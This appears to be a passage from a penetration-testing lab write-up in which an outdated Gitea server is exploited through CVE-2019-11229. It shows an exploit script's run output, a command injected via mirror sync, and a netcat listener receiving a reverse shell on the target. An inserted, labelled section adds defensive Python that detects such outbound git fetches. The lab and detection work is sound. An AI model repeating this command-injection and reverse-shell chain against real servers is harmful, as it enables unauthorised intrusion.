CVE-2019-11229


The target Gitea instance is vulnerable to CVE-2019-11229 because it runs an outdated version, 1.7.5.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort]
└─$ python3 CVE-2019-11229.py
Logging in
Logged in successfully
Retrieving user ID
Retrieved user ID: 1
Initialized empty Git repository in /tmp/tmpl47szlzz/.git/
[master (root-commit) eebfabc] x
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 x
Cloning into bare repository '/tmp/tmpl47szlzz.git'...
done.
Created temporary git server to host /tmp/tmpl47szlzz.git
Creating repository
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/HEAD HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/objects/ee/bfabc5891589166f91ae3394504b6ee49a82cd HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/objects/58/05b676e247eb9a8046ad0c4d249cd2fb2513df HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 HTTP/1.1" 200 -
192.168.206.67 - - [04/Apr/2025 15:20:45] code 404, message File not found
192.168.206.67 - - [04/Apr/2025 15:20:45] "GET /tmpl47szlzz.wiki.git/info/refs?service=git-upload-pack HTTP/1.1" 404 -
192.168.206.67 - - [04/Apr/2025 15:20:46] code 404, message File not found
192.168.206.67 - - [04/Apr/2025 15:20:46] "GET /tmpl47szlzz.git/wiki/info/refs?service=git-upload-pack HTTP/1.1" 404 -
Repo "tnkcwlba" created
Injecting command into repo
Command injected
Triggering command
Command triggered

Executing the modified exploit script

The exploit script performed the mirror synchronization, and the injected command was executed on the target to fetch the payload.
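The server-side log above shows the one outbound request the Gitea host had to make for this to work: a git smart-HTTP ref discovery (info/refs?service=git-upload-pack) against a server it should never talk to. The following is an added example, not part of the original writeup or the exploit script, that flags such fetches in a forward-proxy log in front of the Gitea host; the proxy log format (Common Log Format with absolute request URLs), the allowlist of approved origins, the sample lines and the port 8000 are all assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Common Log Format as written by a forward proxy: the request target is an
# absolute URL, so the destination host of each fetch is recoverable.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Smart-HTTP ref discovery: the first request every git fetch/clone issues,
# and exactly what the Gitea server sent to the attacker's temporary server.
UPLOAD_PACK = "service=git-upload-pack"


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def suspicious_fetches(lines, gitea_hosts, allowed_origins):
    """Return (timestamp, destination host, repo path) for each git fetch that a
    Gitea host started against an origin outside the allowlist."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["client"] not in gitea_hosts:
            continue
        url = urlsplit(rec["target"])
        if url.query != UPLOAD_PACK or not url.path.endswith("/info/refs"):
            continue  # object/HEAD requests follow the ref discovery; one hit per fetch
        if url.hostname in allowed_origins:
            continue
        hits.append((rec["ts"], url.hostname, url.path[: -len("/info/refs")]))
    return hits


# Constructed sample: an approved internal mirror sync, then the ref discovery
# from the writeup pointed at an unapproved host (attacker address, placeholder port).
SAMPLE_LOG = [
    '192.168.206.67 - - [04/Apr/2025 15:10:02] "GET http://git.internal.example/team/app.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -',
    '192.168.206.67 - - [04/Apr/2025 15:20:45] "GET http://192.168.45.249:8000/tmpl47szlzz.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -',
    '192.168.206.67 - - [04/Apr/2025 15:20:45] "GET http://192.168.45.249:8000/tmpl47szlzz.git/HEAD HTTP/1.1" 200 -',
    '10.0.0.5 - - [04/Apr/2025 15:21:00] "GET http://github.com/x/y.git/info/refs?service=git-upload-pack HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for ts, host, repo in suspicious_fetches(SAMPLE_LOG, {"192.168.206.67"}, {"git.internal.example"}):
        print(f"{ts}: Gitea fetched {repo} from unapproved origin {host}")
```

Only requests whose client is the Gitea host are considered, so an ordinary workstation cloning from an external origin (the last sample line) is not reported.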

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort]
└─$ nnc 2222
listening on [any] 2222 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.67] 35626
whoami
chloe
hostname
roquefort
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:15:1f brd ff:ff:ff:ff:ff:ff
    inet 192.168.206.67/24 brd 192.168.206.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the chloe user by exploiting CVE-2019-11229.